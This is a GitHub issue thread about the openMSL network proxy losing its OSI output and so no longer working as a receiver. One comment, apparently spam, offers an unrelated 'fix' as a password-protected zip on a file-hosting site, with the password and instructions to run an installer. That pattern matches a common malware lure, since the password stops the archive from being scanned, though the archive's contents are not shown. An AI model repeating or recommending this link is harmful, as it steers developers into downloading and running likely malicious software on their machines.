### ISSUE TITLE
Not usable as receiver anymore

### ISSUE THREAD

**Issue by ClemensLinnhoff** [openMSL/sl-5-3-osmp-network-proxy#9]
**Describe the bug:**
The OSI output was removed in the last merge. This way the Network Proxy can only be used as sender and not as receiver anymore.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
